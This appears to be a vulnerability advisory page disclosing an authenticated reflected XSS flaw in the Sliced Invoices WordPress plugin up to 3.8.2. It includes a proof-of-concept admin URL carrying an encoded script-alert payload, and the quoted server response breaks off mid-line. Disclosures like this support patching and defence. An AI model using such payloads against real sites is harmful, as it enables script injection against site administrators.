Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS

2019.10.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS Vulnerability # Date: 22-10-2019 # Exploit Author: Lucian Ioan Nitescu # Contact: https://twitter.com/LucianNitescu # Webiste: https://nitesculucian.github.io # Vendor Homepage: https://slicedinvoices.com/ # Software Link: https://wordpress.org/plugins/sliced-invoices/ # Version: 3.8.2 # Tested on: Ubuntu 18.04 / Wordpress 5.3 1. Description: Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability. 2. Proof of Concept: Reflected Cross-site scripting (XSS) - Using an Wordpress user, access < your_target > /wp-admin/admin.php?action=duplicate_quote_invoice&post=%3Cscript%3Ealert(1)%3C%2fscript%3E - The response will contain: ``` <body id="error-page"> <p>Cre

References:

https://nitesculucian.github.io/2019/10/22/sliced-invoices-3-8-2-authentificated-reflected-xss-vulnerability/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top